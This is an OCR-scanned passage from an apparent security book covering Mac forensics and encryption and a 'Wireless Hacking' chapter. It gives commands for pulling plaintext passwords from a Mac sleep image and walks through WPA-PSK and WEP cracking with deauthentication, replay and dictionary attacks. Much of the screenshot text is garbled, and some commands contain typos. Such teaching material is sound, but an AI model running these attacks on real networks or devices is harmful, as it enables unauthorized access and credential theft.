lagtisoned Dane Bering 304105926.1 
Ld wing Cooge 
waitCeuet Number 40 
pw Array ($ meres) 
Li si Dictionary IÉ Hers! 
nem 2 Dictionary — (7 mems) 
hem 3 Dictionary I6 noms) 
LE sel Dictionary (5 Mera! r1 
b hem i [le MEL] t] 
bree Deens |O homs) “A 
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The downloads plist will sometimes indicate whether the user has been naughty or nice. 


Oletiomary $ 
v DownleadHitory Array (20 nee) 
Them 0 Dictionary — (8 nems) 
DownloadEnryAlias Boh Data «00000000 01180002 00000c44 61613595e 746/7158 
Download ntryidentfer E] B 610344-756(-4921-8132-401/024152A8 
DownloadEmryPath Strieg ~/ Downloads /documenmstogoghn2.0000.2 en. deg 
DownloadEnryPostAliasBiob Data «00000000 03860002 00010f44 66637564 656e7473 
DownloadintryPostPath Strieg Volumes iDocuments To Go 
DownloadEmryProgressibytesSoF. Number 1692628 
DewnloadintryProgressTeealTol Number 1692628 
DownloadEntryURIL. Strieg ttp. / /Gownload dataviz.com/documentstogo/ iphones 
> item 1 Cictionary (8 nems) 
> tem 2 Dictionary — (8 Herma) 
> hem 3 [Dictionary (6 nema) v 
b item 4 Dictionary (6 meres) ` 
> item $ Cictionary — (B nems) 


Finally, a look at the cache reveals information about the user’s browsing session, including 
picture files. The Internet Cache is stored on Mac OS X to speed up the user’s browsing experience. 


^ TS SEC eee 5 
juptuntes teagan ero? ATE. 
B o ae = kasama Shades 
+ maces pam ^ KATELM csmt m 
LL laaman utamana = Cara serale £ a 
» 12494019 asas peg = 
net t— Cata Lo perm 
o Combs S9TMI. (814900 — 
ICsturiyut MIRE BIDE pe 
ee Ceres Maret EDV e 
mance FOR. —— eoim — 
Jw oo WORLD und 
ow t WORSE DIAM pom 
m noon DOUMOA 106420 
o — dt rmm 
x nutes 1 - 
son 
— INCL M7 e 
— quini) Oe 
mem Im DONTE ADAD jpeg. 
en 
yard Lam 
fanans 2OLISCE 3106009 
mem Agen 20047500 LX weg 
m n ^ OMU WS eg 
—— +L —á amo | 
Imedzn ele + pvo E 
a5 RE PT 


In order to protect your personal information, you have the ability to erase many of the arti- 
facts stored by Safari. The following are a list of items that a user can select to reset within Safari: 


History 

Top sites 

Web page previews 
Cache 

Download windows 
Cookies 

Website icons 

Names and passwords 


Autofill 


FileVault 
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= Are you sure you want to reset Safari? 
e Select the items you want to reset, and then click Reset. 
You can't undo this operation. 
fV Clear history 
M Reset Top Sites 
(VÍ Remove all webpage preview images 
M Empty the cache 
fV Clear the Downloads window 
M Remove all cookies 
F Remove all website icons 
fV Remove saved names and passwords 
(VÍ Remove other AutoFill form text 
fV Close all Safari windows 
C Reset all location warnings 


® Cancet_) ( Reset _) 


m 343 


In order to prevent people from either using the boot DVD to reset your password or imaging your 
Mac with a live CD and reading your data, encryption software like FileVault or TrueCrypt can 


be utilized. Since FileVault comes with OS X, we will examine that first. 


To implement FileVault, 


1. Click on the blue apple in the top left-hand corner of the screen. 


2. Select System Preferences. 
3. Under the Personal category, select Security. 


eoo System Preferences 


C Chowan) 


ce Dashboard& Desktop & International 


C] 2 85 = njo 


Exposé Screen Saver 


4. Click Turn On FileVault. 
5. If a master password has not been set, it must be. 


6. Click Turn On FileVault. 


eoo Security 


C (show an) 


FileVault 


Spotlight 


CD 


= | FileVault secures your home folder by encrypting its contents. It automatically 
4 Q encrypts and decrypts your files while you're using them. 


mew WARNING: Your files will be encrypted using your login password. If you forget your 
login password and you don't know the master password, your data will be lost. 


A master password is set for this computer. 


This is a "safety net" password. It lets you unlock 
FileVault account on this computer. 


FileVault protection is off for this account. 
Turning on FileVault may take a while. 


SN | Camara 
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7. Type your password to turn on FileVault. 


FileVault requires that you type the password 


Q for this user account. 
usen [[— — — — —] 


8. Check the Use secure erase Button. 
9. Click Turn On FileVault. 


eo Security 


You are now ready to turn on FileVault protection. 


Q WARNING: Your files will be encrypted using your login password. 
If you forget your login password and you don't know the master 
password, your information will be lost. 

Once you turn on FileVault, you will be logged out and FileVault will encrypt your 
entire home folder. Depending on how much information you have, this could take 
a while. You will not be able to log in or use this computer until the initial setup is 
completed. 


You can't log in to this account from another computer to use it for Windows file 
or printer sharing. 


© [Mesues] 4—À Cancel) Cram onrievaui) 


10. The system will indicate the Home folder is being encrypted. When finished, the operating 
system will return to the Logon screen. You need to log in again. 


si 


Q 


FileVault 


Encrypting kim's Home folder 


=== = =“ 


Creating FileVault... 


S 
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11. This process is transparent for the user; the only difference they may notice is the lock icon 
in front of their username that indicates FileVault Encryption. 


Pictures 


8 items, 2.09 GB available 


FileVault Security Concerns 


In OS X everyone should be concerned with FileVault passwords. Obtaining the FileVault pass- 
word is possible. If the system is using OS X 10.5, by default the swap file and sleep image are not 
encrypted. However, in Snow Leopard, Apple fixed this vulnerability and made the sleep image 
and swap files encrypted. So if one encounters a Leopard system, there is an end around that 
investigators need to try first: 


1. The sleep and swap image reside in the /private/var/vm folder. The sleep image is created 
when the computer goes into hibernation mode in order to save battery life and is similar 
to the Windows hibernation file (hiberfil.sys). A wealth of information that can be gleaned 
from the sleep image. Passwords for FileVault can (and emphasize can, not always) be found 
in the sleep image. Since everything is mostly plain text, a simple search can locate not only 
FileVault passwords, but a multitude of passwords. 

2. So how do we find them? Well, there are two ways. From the command line, create a grep 
expression that looks for text after “longname.” This will locate all usernames and passwords 
from the sleep image. Look at all the hits. The hits with the passwords will have the user- 
name followed by “password” and the actual password in plain text, for example, strings -8 
/var/vm/sleepimage | grep -A 4 -i longname. 

3. For Windows examiners, EnCase can be used to locate them as well. First, from the tree 
pane, navigate and locate the sleep image. Blue check the sleep image and create a keyword 
for “longname.” Run the keyword search and minimize the search to the single blue checked 
sleep image. Look at all the hits. The hits with the passwords will have the user name fol- 
lowed by “password” and the actual password in plain text. 


Ifthe passwords can't be located, then you are going to have to use some tools that can crack FileVault. 
There are a couple of tools that can assist in this. There is a tool available for Law Enforcement to 
retrieve this password. Individuals within LE can contact their forensic support person to get it. 
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George Starcher has also created crowbarDMG. If passwords are not located in either the swap file 
or sleep image, there are three additional methods that can be used to crack FileVault: 


1. Crack the user's login passwords, located at /private/var/db/shadow/hash. 
2. Crack the key chains themselves. (The key chains are unencrypted except for the passwords 


themselves. Many items of interest can be located just by using strings.) 
3. Attack FileVault itself. 


One possible command line fix, to use with OS X v10.5.8, is: 


sudo pmset -a hibernatemode number below based on the appropriate situation. 


0 No sleep image is used, and RAM contents are kept alive. 

1 Only sleep image is used, and RAM contents are purged. 

3 RAM is kept alive and a sleep image is used when power reaches critical levels. 

5 Only sleep image is used, but with secure virtual memory enabled. 

7 Bothlive RAM and sleep image are used, but with secure virtual memory enabled. 


Apple did fix this and improved the security of OS X. Credit goes to Mr. Johnny Long, who origi- 
nally identified this vulnerability more than 4 years ago. 


TrueCrypt 


Since the dawn of computers, good and bad users have tried to hide their data. Today, there are 
many types of free and proprietary programs that can obfuscate the data that is stored on a hard 
drive. One of the most widely used programs is TrueCrypt. This is a cross-platform tool that is very 
robust. TrueCrypt can be downloaded for free from the following location: http://www.truecrypt. 
org/downloads. TrueCrypt can encrypt the volumes. USB drives can be encrypted using this tool. 
The installation is easy and the use can be easy or complicated depending on the skill of the user. 
Since encrypting the operating system was covered in Chapter 1, this section will focus on encrypt- 
ing a single file. Perform the following steps to create an encrypted container: 


1. Download TrueCrypt. 
2. Start the TrueCrypt application. 
3. From the TrueCrypt interface, select Create Volume. 


| Create Volume Volume Properties. (.— Wipe Cache 
Volume. 

| H iever snee history Volume Tools...) 

| 


| CG Mout) (Mount All Devices) (  Dismount All (CC Gee  ) 
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4, A wizard will then appear that will guide the user in the creation of a volume. 


TrueCrypt Volume Creation Wizard 


(9 Create an encrypted file container 


Creates a virtual encrypted disk within a file. 
Recommended for inexperienced users. 


More information 
© Create a volume within a partition/drive 


Formats and encrypts a non-system partition, entire 
external or secondary drive, entire USB stick, etc. 


© (<Prev GHEY (Cancel ) 


‘There are two options: creating an encrypted container or a whole volume, such as a USB 
drive. Select Create an Encrypted File Container. This is a basic file that is commonly 


used. 


5. Next, a volume type is requested. There are two types. One is a single volume; the second is 
a hidden volume that gives an individual plausible deniability by having the option to give a 
password to the outer container while keeping the inner container secret. 


Volume Type 


© Standard TrueCrypt volume 


Select this option if you want to create a normal 
TrueCrypt volume. 


O Hidden TrueCrypt volume 


It may happen that you are forced by somebody to reveal 
the password to an encrypted volume. There are many 
situations where you cannot refuse to reveal the 
password (for example, due to extortion). Using a 
so-called hidden volume allows you to solve such 
situations without revealing the password to your 
volume. 


More infi jon about hidd I 


@ Prev END) (Cancel ) 


TrueCrypt volumes can be hidden within other TrueCrypt containers. This technique can 
be used so the user, under pressure, can reveal a password that gives access to one volume, 
but not the additional hidden volume within. 
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OUTER 
CONTAINER 


HIDDEN 
CONTAINER 


6. The next is the most important step: the user can call the container anything they wish and 
place it anywhere they want. For example a container can be called hidden.txt or be named 
in similar fashion to a system file with a slight variation so it would look innocuous. 


ooo TrueCrypt Volume Creation Wizard 


Volume Location 


( Select File... ) 


^— 


Where: (RD Documents — 1 11 W 


Format: | All Files | 


pt existing files (later on) by moving them to t! 
TrueCrypt container that you are about to create now. 


@) («Prev Y Next > Cancel 


7. Next the dialog box asks what type of encryption to utilize. There are eight different algo- 
rithms that can be used. 


Serpent-AES 
Serpent-Twofish-AES 
Twofish-Serpent 


Hash rithm 


(aremD-160 TE information on hash latas 


@ Corre E) Cancel ) 
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8. Next, the user can specify the size of the encrypted volume. The program also gives the avail- 
able space that can be used. 


Volume Size 


(ws 8) 
Free space available: 92.6 GB 


Please specify the size of the container to create. Note that 
the minimum possible size of a volume is 292 KB. 


© Prev next) Cancel ) 


9. Next, the password for the volume can be generated by the user. 
Note: Key files can also be incorporated to give additional security. 


Volume Password 


Password: seeeeeee 
Confirm password: «esesses 


C Display password 


C Use fies 


It is very important that you choose a good password. You 
should avoid choosing one that contains only a single word 
that can be found in a dictionary (or a combination of 2, 3, 
or 4 such words). It should not contain any names or dates 
of birth. It should not be easy to guess. A good password is 
a random combination of upper and lower case letters, 
numbers, and special characters, such as Q ^ = $ * + etc. 
We recommend choosing a password consisting of more 
than 20 characters (the longer, the better). The maximum 
possible length is 64 characters. 


UEeL-» — Cant) | 


10. The program will ask if this container will be used on different computers, which gives the 
container portability, and then will format the volume that it creates. 
11. The container is created and can be seen in the finder. 


eo | 
ne [22|=fjm) Lo} 
Y DEVICES fseventsd b 

@ Snow Leopard | C .Trashes 

Ei iDisk 

|) NO NAME ^ 

¥ ConceptDraw Office + 
V DEACEC 


After all data has been placed into the container, if the volume is ejected, the data is encrypted. 
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To open the TrueCrypt containers: 


1. Start the TrueCrypt application. 
2. Click Select File and navigate to the TrueCrypt volume. 
3. Select Mount. 


900 TrueCrypt 


Volume Size — Mount Directory Type 


C Cache passwords and keyfiles in memory 
C Display password 
em 


C Use keyfiles 


re 
Volume 
/Users/crash1784/Documents/HIDDEN.TXT B Select File.. 
S Never save history ^ Volume Tools... ) (Select Device... 
Mount ‘Mount All Devices Dismount All Close 


4, Input the password and the volume will then be unencrypted. 
5. The volume will mount in the sidebar as was seen previously. 


There are other programs, such as pretty good privacy (PGP), that now have support for Mac 
devices and can give the security of disk encryption. Encryption is a two-sided sword. It can help 
organizations that have a need for security, or it can hurt by hiding information that would be 
critical in judicial and civil matters. 


iPhone 


These is a new piece of software that will allow you to mount your iPhone, iPad, or iPod Touch 
as a hard disk. This device is called Phone Disk, and a 15-day trial is offered by the manufacturer. 


Note: iTunes 9 or higher must be installed prior to installing the software. 


To install Phone Disk, 


1. Download the software for Windows or Mac from macroplant.com/phonedisk/. 
2. Unzip the file. 

3. Double click on PhoneDiskSetup.exe. 

4. Click Next four times. 

5. Check the box that states Create a Desktop Icon and click Next. 
6. Click Install. 

7. Click I Agree. 

8. Click Install. 

9. Click Close. 
10. Click Finish. 
11. Launch the software then click Close. 
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Welcome to Phone Disk 
Phone Disk finally lets you have the contro! 
over the iPhone. This tiny program runs in 
the background of your computer end 

simply mounts the device into disk mode 

end can be controlled by the little icon in the 
bottom right corner of your screen. It works 
with any model iPhone or iPod Touch. 


Phone disk comes with a free 15-day demo 
for you to try the software. If you like it, 
please buy a registration code to unlock the 
full version and help support further. 
development of the program. 


Buy Registration Code. Enter Registation Code 


There are 15 days left before the Phone Disk demo expires. 


Show this screen when Phone Disk stants 


To use the software 


1. Insert your iPhone. 


2. Right click on the yellow phone in the right-hand coner of your taskbar. 
3. Choose iPhone, Reveal In Explorer. 


Check for Updates... 


Buy Registration Code 
Enter Registration Code 


Ele Edt wew Favorites Tools Help a 


Q=- Q- X Dreh E Foos | T- 
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By clicking on the DCIM folders, I can see the pictures. 


& 100APPLE 
Fie Edt View Favorites Tools Help a 
Q- © & JO search [> Folders ij] 
© MApcIMuoDAPPLE «Ee 
^ 
File and Folder Tasks (4) imc cami 3 
CI Make a new folder nummum 
@ Publish this folder to the 
Web 
bad Share this folder Hag? 
IMG 0146.PNG 
IMG 0150.PNG 


OnTheGoPlaylist. 1.piist 
QuickTime Preferences 
1KB 


QuickTime Preferences 
1KB 


Ringtones. plist 1 
QuickTime Preferences QuickTime Preferences 
1 KB 1 KB 
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An example of what one of the plist files looks like opened with Wordpad: 


Ë GeniusPlaylist.plist - WordPad 

Ele Edt yew Insert Format Hep — — — 
Dee SAA :-&- 85 
<?xml version="1.0" encoding="UTF-8"?> 


<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
<plist version="1.0"> 


<dict> 


<key>delete¥ithoutSyncing</key> 
<true/> 
<key>playlistPersistent ID</key> 
<integer>-8913578096960576670</ integer> 
</dict> 
</plist> 


Now here is the strange part about this software: 


B IfI put the iPhone into a system it has never been in before, it will not read the disk if there 
is a passcode. 


B IfI put it into a system it has been in before 
— It reads the disk with a changed passcode (without entering it). 
— It reads the disk even if the passcode was not set when I plugged it in previously. 


To protect your iPhone, iPad, or iPod Touch from a tool like Phone Disk, set a passcode: 


1. Select General from the Settings tab. 


© notifications On > 
E>) Sounds > 
B Brightness > 
< Wallpaper > 


B owen] <—— : 


Mail, Contacts, Calendars > 
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2. Select Passcode Lock. 


General 


3. Select Turn Passcode On. 


General Passcode Lock 


Turn Passcode On 


Require Passcode Immediately > 


Simple Passcode 


Erase Data 


4, Set your passcode with a four-digit PIN. 


5. Reenter your four-digit passcode again so it can be verified. 


No SIM 8:55 AM xm 


Set Passcode Cancel 


Re-enter your passcode 


EBENEN 


6. Change the AutoLock settings if necessary. 


No SIM 8:55 AM 3 am 
Passcode Lock Require Passcode 


Immediately v 


After 1 minute 


After 5 minutes 


After 15 minutes 


After 1 hour 


After 4 hours 


Shorter times are more secure 
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7. The Immediately Require Passcode setting makes the iPhone even more secure. 
Note: An Erase Data setting will erase the phone’s data after 10 failed attempts to enter the 
passcode. 


General Passcode Lock 


| Turn Passcode Off 


| Change Passcode 


| Require Passcode immediately > | 


“Simple Passcode — NEN 


A simple passcode is a 4 digit number. 


| Erase Data f | OFF 


Erase all data on this iPhone 
after 10 failed passcode attempts. 


8. The lock indicates that the iPhone will require a passcode to be accessed. 


9. Enter the passcode to get back into your iPhone, iPad, or iPod Touch. 
Note: Perform a search on Google for a passcode bypass on iPhone 4 using emergency call. 
It might be informative. 
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Emergency 


Cancel 
Call " 


If someone tries to plug your iPhone into a system that it has never been plugged into before to 
try to read the data, it will not be successful. A “locked with a passcode” message will be displayed. 
You will need to enter the passcode to read the device with iTunes or Phone Disk. 


Advanced Help iTunes 


z 


— o Elala 


Music 


Songs and music videos you add to iTunes appear in Music in your iTunes library. To 
play a song, just double-click it 
iTunes fxj 
iTunes could not connect to the iPhone "Iphone" because it is 
locked 


with a passcode. You must enter your passcode on the port your CDs. 
iPhone before it can be used with iTunes. th iTunes, any song in your CD collectior 


Summary 


Although Macs have always had a better reputation for security, that is likely due to two factors: 


B Less people use them. 
W Mac controls the hardware. 


Mac OS X has weaknesses that can be exploited, like the ability to reset the password using the 
install DVD. Like any other operating system, it is always a good idea to use encryption software 
like TrueCrypt or FileVault. TrueCrypt will protect more of the data on the drive since FileVault 
only encrypts a user's Home folder. FileVault is easier to implement because it is part of the Mac 
OS X operating system. With the popularity of a device like the iPhone, hackers will take the time 
to identify and develop exploits so they can harvest their information. 


Chapter 14 


Wireless Hacking 


Introduction 


The advent of wireless communication technology has affected everyone in one form or another. 
Users have been able take advantage of much greater convenience, the system administrators and 
defenders have had to assume this additional responsibility, and hackers and researchers have been 
given a new playground to roam. Simply put, wireless connectivity has been a game changer. 

Whether defending or attacking, all aspects of the network system are affected when a wireless 
capability is introduced onto a network. This is because it adds yet another avenue for someone 
to try to exploit. The important thing to remember is that if someone is able to breach the Wi-Fi 
security in place, then they have internal access to the entire network. What this means is that 
once this phase is complete all other techniques and scenarios contained in this book can then be 
used against the systems on the network. 

Another important factor to keep in mind is that not only are the systems connected to the 
network in jeopardy, but also the communications that are traveling over that wireless medium. 
This is due to the fact that a wireless access point works at layer 2, which is where Media Access 
Control (MAC) addresses are being utilized. This makes this segment of the network act similar 
to a network where devices are connected to a hub. ‘Therefore, the transmissions are capable of 
being seen by all those connected to the wireless network, unlike a switched network, where 
data that is set for a specific client is sent to only that client. Thus, techniques such as Address 
Resolution Protocol (ARP) spoofing are not needed on a wireless network. 

In this chapter we will cover some of the weaknesses of the Wi-Fi technology and give real 
world examples of how these weaknesses can be used to expose other areas that may not be com- 
pletely obvious at first. The wireless connectivity arena is extremely large, so it’s impossible to cover 
every possibility or scenario in a single chapter. Therefore, the primary focus is going to be on the 
areas that affect most users. 

Please note, the information contained in this chapter will discuss technologies and methods 
that make it possible to break local, state, and/or federal laws. Legal aspects and implications will 
not be discussed. The reader assumes any and all responsibility for any testing or actions that come 
from the additional knowledge contained in this chapter. 
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Wi-Fi Hardware and Software 


Before we can begin, it's important to understand what software and hardware will be used to inject 
and capture the wireless traffic. There are certain things to be aware of that may not be obvious to 
most people, so this is meant to try and help save some time and frustration. The primary pieces 
are the operating system, capture and analysis software, and the Wi-Fi capture device and drivers. 

‘The operating system will play a key role in determining what other hardware will be required. 
If a version of Microsoft Windows is going to be used, then an AirPcap adapter will be required. 
The AirPcap adapter allows a Windows machine to monitor and capture wireless traffic and has a 
price range from around $200 to $700, depending on functionality. This adapter is only used as 
a monitor device and cannot be used as an actual wireless network device. Therefore, it can't be 
used to actually connect to a wireless access point. When it comes to capturing network traffic, 
this is a positive thing. When capturing, you don't want your device to be able to send any type 
of traffic out of that device. 

My own personal preference is to use a distribution of Linux called BackTrack. BackTrack 
is a very useful and popular Linux security distribution that can be downloaded free of charge 
from www.backtrack-linux.org and is available as a bootable DVD ISO or preconfigured vir- 
tual machine (VM) appliance. It comes with all the necessary tools and utilities already ins- 
talled to capture and analyze wireless traffic. A Wi-Fi capture device that is functional in 
BackIrack is the Alfa wireless adapter with the RealTek 8187 (RTL8187L) chipset such as 
the Alfa AWUS036H 802.11 B/G USB wireless adapter. This wireless adapter is supported 
by BackTrack and costs around $20 to $40 depending on power levels. Another option may 
be the Alfa a/b/g/n AWUSO50NH with the rt2800usb drivers. Many other Wi-Fi devices are 
supported but be aware that you must always check to see what functionality is supported by 
those particular devices drivers. Also, you need to consider what alternate device drivers exist 
that may support your device and the additional functionality those may have. Basically, not 
all Wi-Fi devices will have the same capabilities. On a positive note, the Wi-Fi security arena is 
very active. So, just because a particular device doesn’t have certain capabilities today, doesn’t 
mean that someone isn’t developing support for it. The best thing to do is to check the www 
.aircrack-ng.com website for a list of the latest supported devices or the BackTrack forums for more 
information about getting your specific device working. 

The last thing we need is the software to capture and analyze the wireless traffic, such as 
airodump-ng from the aircrack-ng suite (aircrack-ng.org), and industry-leading network protocol 
analyzer Wireshark (wireshark.org). The aircrack-ng suite is a whole collection of tools geared 
towards all things Wi-Fi. Airodump-ng is one of the tools and is a command-line utility designed 
to capture wireless traffic. Wireshark is a powerful free application that is capable of analyzing 
network traffic and even capturing wireless traffic. Wireshark was created by Gerald Combs, who 
is still an active primary member of the project. Although Wireshark is an outstanding applica- 
tion, it has been my experience that airodump-ng is more reliable at capturing more Wi-Fi data 
than Wireshark. Therefore, I usually capture traffic with airodump-ng and then analyze that traf- 
fic with Wireshark. 


BackTrack Setup: Quick and Dirty 


We are going to discuss using BackTrack to perform a different operation in this chapter. 
Therefore, we need to quickly discuss getting BackTrack up and running, updated, and ready 
to go. It’s my strong opinion, for many, many reasons, that anyone who wants to consider 
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themselves any type of security professional should have at least a basic comfort level of using 
Linux. This is one of those skills that a person doesn't realize they're missing until they actu- 
ally have it. 

The first thing to do, if you don't already have the workstation version of VMware, is to down- 
load and install the free version of VMware Server at www.wmware.com. This will allow you to 
run the BackTrack VMware appliance. Next, download the latest BackTrack VMware appliance 
from www.backtrack-linux.org/downloads. After the download is finished, it’s recommended to 
go ahead and check that the md5 hash matches correctly to verify the download was successful 
and as intended. 

Next we are going to start and update BackTrack. Open the appliance in VMware. When the 
terminal prompt is displayed, type 


B root (this is the default username) 
B toor (this is the default password) 
E startx (this will start the X Windows graphical user interface [GUI]) 


The next thing we are going to do is update the system. Open a terminal window and type the 
following: 


B /etc/init.d/networking start (start the networking services) 
B apt-get update (update the package list) 
B apt-get upgrade (upgrade install packages, select Y to confirm and continue) 


Now we have an updated functional operating system ready to do what's necessary to capture and 
analyze the Wi-Fi networks. If you are new to the Linux world, take some time to check out the 
available tools in the GUI menu, but also keep in mind that most of the utilities are executed from 
the terminal window. 


Monitor Mode 


One of the things to be aware of is called “monitor mode.” Typically, network devices only pay 
attention to the traffic that is directed at them. In the most simplistic form, by putting the device 
in monitor mode, it's told to pay attention to all traffic that it can see. From there, the traffic can 
be viewed live or redirected and saved out to a file. There have been updates to the aircrack-ng suite 
that makes it easier for the user. Some devices don't have to manually be put into monitor mode 
to be able to correctly function. 

The first thing to do is make sure the USB wireless device is connected to the computer and 
the BackTrack appliance is booted. Then make sure the device is connected to the VM by select- 
ing VM » Removable Devices and making sure the device is checked. This is how to connect or 
disconnect devices from an appliance. 

Next open a terminal window and type airmon-ng. This will display any device connected 
to the system that is capable of being put into monitor mode; in this scenario it’s wlan0. As with 
many but not all Linux command-line utilities, to view the help syntax type airmon-ng —h. 
Use the airmon-ng command to enable monitor mode by typing airmon-ng start wlan0. Type 
airmon-ng again to verify it worked correctly. You should see an additional device called mon0, 
as shown here. 
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Cracking WPA-PSK 


In this section we are going to walk through testing a Wi-Fi protected access pre-shared key 
(WPA-PSK) protected wireless network. One primary aspect to take away from this section is 
that it doesn't matter if the network is utilizing WPA or WPA2 encryption. The attack vector 
is exactly the same: a dictionary attack. To be able to recover the passphrase on a WPA net- 
work, it's necessary to have a dictionary file that contains the passphrase of the network 
being tested. So the next question could be, where would someone get a decent password 
dictionary to start with? A great starting point would be at the www.offensive-security 
.com/wpa-tables website. This site contains a 49 million WPA-optimized password dictionary 
file that can be downloaded for free. What's meant by WPA optimized is that WPA requires a 
passphrase to be at least eight characters. So this file only contains passwords of at least eight char- 
acters. This file has been used to create the WPA rainbow tables that can also be downloaded from 
that page. We'll discuss more about WPA rainbow tables in a later section. 

The first thing we need to do is identify information about the network that we are going to 
be testing. To do this, execute airodump-ng wlan0. From the next screenshot we can see that we 
have the information we need to target the service set identifier (SSID) realiteechk. We have the 
channel, MAC or basic service set identifier (BSSID), of the access point, the security settings of 


root@bt: — - Shell - Konsole 
Edit View Bookmarks Settings Help 


CIPHER A 


AMTM4 


WE Shell | gg Shell No.2 | gg Shell No. 3 
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the WPA2 preshared key, and advanced encryption standard (AES) encryption. At the bottom of 
the screen we can see what client is currently connected to that access point. 

We can now take this information to create a more focused and directed command. Notice 
how the command switches coincide with the output in the screenshot. To begin capturing data 
for only that SSID we execute the following command: 


airodump-ng --channel 1 --bssid 00:14:BF:20:90:37 wlan0 -w file 


We want to keep this window running so we can capture the handshake when the client con- 
nects to the access point. In WPA, a capture file with the handshake is all that’s needed to be able 
to launch the dictionary attack. 

There’s no way to tell how long it may take for the workstation to disconnect then reconnect 
to the access point on its own. So we are going to help move the process along by knocking the 
workstation off the network using airepaly-ng. The good news about wireless devices is they will 
automatically reconnect. To do this, open another terminal window and type aireplay-ng —help 
to view the syntax and options that are available. In looking at the options, we can see that we 
want to use the replay option —a to set the BSSID, the —c to set the destination MAC, and the -0 
to specify the deauthentication (deauth) type of attack. The full command would be 


aireplay-ng -0 5 -a 00:14:BF:20:90:37 -c 00:13:CE:45:24:D6 wlan0. 


The number 5 in the command specifies the number of deauth packets to send. If this number 
is omitted, aireplay-ng will continually send deauth packets. Therefore, the client would not be 
able to reconnect to the access point (AP) until this command was manually stopped. The follow- 
ing screenshot shows an example of the output of this command. 


root@bt: — - Shell No. 
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Watch the client workstation as this command is executed. You should notice that almost 
instantly the client workstation will lose its connection to the AP. Now go back to the airodump-ng 
terminal and watch in the upper right-hand corner. When airodump-ng captures a complete 
handshake, it will display the BSSID for which it was captured. Verify that the BSSID is for the 
network you are testing. 
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If capturing the handshake is unsuccessful the first time, repeat the same command. There are 
many factors that could come into play, such as range, interference, and others. Also make sure 
the client is automatically connecting. Sometimes, if too many deauth packets are transmitted at 
once it may take longer for the client to reconnect, or it may not reconnect at all. The next step 
is to use aircrack-ng to process a password dictionary file against the capture file(s). For our test- 
ing purposes we are going to be testing with the small sample dictionary file located at /pentest/ 
wireless/cowpatty/dict: 


aircrack-ng -e realiteechk -w /pentest/wireless/cowpatty/dict file*.cap. 
If we issue the command aircrack-ng --help we can see what the syntax means. The -e represents 
the ESSID, -w designates the path to the “dict” password dictionary file, and the file*.cap says which 
capture files to analyze. The “*” is used in case there are multiple capture files. The following screen- 


shot displays the final results and shows that the password was successfully found. 


root@bt: ~ - Shell No. 3 - Konsole 
Session Edit View Bookmarks Settings Help 


EY FOUND! [ changeme 


*]| geShell | geShell No.2 | @ Shell No. 3 


Wireless Hacking m 365 


Note (frustration reducer): When testing these scenarios in your lab, there may be instances 
when you are very sure you are doing the right thing, but the result is always a fail. One thing to 
check is to make sure that not all your equipment is sitting right next to each other, such as on the 
same small desk. For example, if you aren't able to capture the handshake, try moving the client 
machine across the room away from your BackTrack capture system. 


Wired Equivalent Privacy Cracking 


Even though wired equivalent privacy (WEP) is older and easily defeated, you will still find it in 
use. To crack WEP, begin by identifying the channel of the target network using WEP encryp- 
tion. To do this, type airodump-ng wlanO. 


In this case, the channel is 5, so the device should be set to channel 5 by typing: 
iwconfig mode monitor channel 5. 


To verify that the device is listening on channel 5, type iwconfig wlan0. 


To capture wireless traffic on channel 5 and write the captured data to a file called "file," type 
airodump-ng wlan0 —c 5 — w file. 
If there are connected clients you will see their MAC addresses listed under the Station column. 


ER AUTH ID 


SINGWEP 


00:03:F4:D1:3D:02 is the MAC address connected to the AP named USINGWEP (00:1C: 
10:BC:9F:7B). To crack WEP, you will need to generate enough initialization vectors by using a 
replay attack. Open a new terminal and type 


airplay-ng -3 -b 00:1C:10:BC:9F:7B -h 00:03:F4:D1:3D:02 wlanO 
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When you start, you will likely see zero ARP requests. In order to increase this number, per- 
form a deauthentication attack to knock the station off the wireless network for a second. To do 
this, open another terminal window and type 


airplay-ng -0 1 -a 00:1C:10:BC:9F:7B -c 00:03:F4:D1:3D:02 wlan0 


The number of ARP requests needs to increase significantly (should be in the hundreds or 
thousands). If it does not work, try another deauthentication attack. Repeat until ARPs increase. 


Once you have a decent amount of ARPs, you may start using the aircrack-ng tool. To do this, 
type aircrack-ng file*.cap. Select the network you are targeting from the list. 


SSID 


SINGWEP 


rt 
EY55 


Once you have the key, you can connect to the network (if you have permission from the 
owner). 


Wi-Fi Monitoring and Capturing 


To be able to successfully capture the intended Wi-Fi traffic, it’s important to understand how 
the Wi-Fi security settings will affect capturing the data. The actual technologies behind these 
security settings are outside the scope of this book, but there are still important considerations 
to be aware of depending on the security configurations set on the access point (AP). An open 
access point doesn't have any security enabled and transmits all data in the clear. In this instance 
anyone can connect to the access point without needing to input a password. Therefore, anyone 
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within range that has the capability to monitor wireless transmissions will be able to view all the 
associated network data. 

An access point that has its wireless security settings configured to use WEP encryption takes 
a little bit more information to be able to view. One primary thing to note about WEP is that all 
the data is encrypted using the same key. This plays a major role when capturing WEP encrypted 
data because this means that all traffic using that key can be decrypted, even all other devices 
connected to the access point. One way to be able to decrypt the traffic is to configure the IEEE 
802.11 preferences in Wireshark. Notice the option Enable decryption and the area to input the 
key used to encrypt the traffic. 


T Wireshark: Preferences - Profile: Default 


FW-1 
GIOP 
GPRS-LLC 
Gryphon 
GSM SMS 
GSM SMS UD 
GSM Um 
GSM MAP 
GSS-API 
GTP 
H.225.0 
H.245 
H.501 
H248 
H263P 
H264 
HCI_ACL 


A) 


IEEE 802.11 wireless LAN 


Reassemble fragmented 802.11 datagrams: 
Ignore vendor-specific HT elements: 

Call subdissector For retransmitted 802. 11 frames: 
Assume packets have FCS: 


Ignore the Protection bit: 


Enable decryption: — [v] 


G No  Oves-wthokIv — O Yes- with IV 


Key examples: 01:02:03:04:05 (40/64-bit WEP), 

010203040506070809101111213 (104/128-bit WEP), 

wpa-pwd:MyPassword[:MyAP] (WPA + plaintext password [+ SSID), 
wpa-psk:D102030405. ..6061626364 (WPA + 256-bit key). Invalid keys will be ignored. 


+ | wpa-pwd:myhardpassword:Sparta 


11:22:33:44:55 


: |FO:BE:F6:54:55] 


Hilscher 
HTTP 

rc 

ICMP 

IEEE 802.11 


IEEE AN? 16 4 


Ce 


‘This software allows for the ability to view the encrypted traffic by inputting the required keys. 
The key(s) will be applied to each frame in the capture and will decrypt any frame possible and 
therefore successfully decrypt the traffic, allowing it to be viewed in clear text. 


Note: The original capture file is not being altered in any way when inputting the key(s) into 
Wireshark. The Wireshark application is only applying the keys to each frame in the capture file 
